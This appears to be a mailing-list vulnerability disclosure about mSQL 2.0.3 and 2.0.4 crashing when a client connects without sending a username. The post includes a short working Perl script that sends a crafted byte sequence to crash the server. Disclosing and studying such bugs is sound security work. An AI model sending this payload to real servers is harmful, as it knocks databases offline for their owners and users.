mSQL dummies

[boutzev () usa net (Peter Boutzev)]

Hello to everyone,

That is: in function "msqlConnect()" , libmsql checks the user name of
the logged user. Ok, let's try to connect to an mSQL server without sending it.
I thought that my prog did not work, because it was unable to connect the mSQL
server. After several retries, I understood that the server was gone away. I
restarted it, and made a new connection. Here is what happens:

---------------
Hit by a sig 11



Forced server shutdown due to bad signal!


IOT trap/Abort

-------------

I discovered this where I was doing an mSQL Clinent with an old
libmsql.dll under Windows. I have no time to look further on the problem,
and I am useing mySQL now. Anyway here is a small cut of code that demonstrates
the problem.

------------------------- CUT HERE --------------------------

#!/usr/bin/perl
use IO::Socket;
$host = @ARGV[0];
$port = @ARGV[1];

&Connect;

sub Connect {
        $sock = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $host,
            PeerPort => "msql($port)",
            ) or die "Cannot connect !";
        $sock->autoflush(1);
        print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A";
        while (<$sock>) {
                print;
        }
        printf "Y0!-y0-Y0!\n";
}
------------------------------ END ---------------------------

I don't know was this discussed here before, ot not, I informed Hughes
Technologies 5 months ago, and they did not respond me. Maybe in the new
mSQL 2.0.5 or later the bug was patched, I have no time to test it. 2.0.3
and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access
with this. Anyway, I thought that it should be posted here...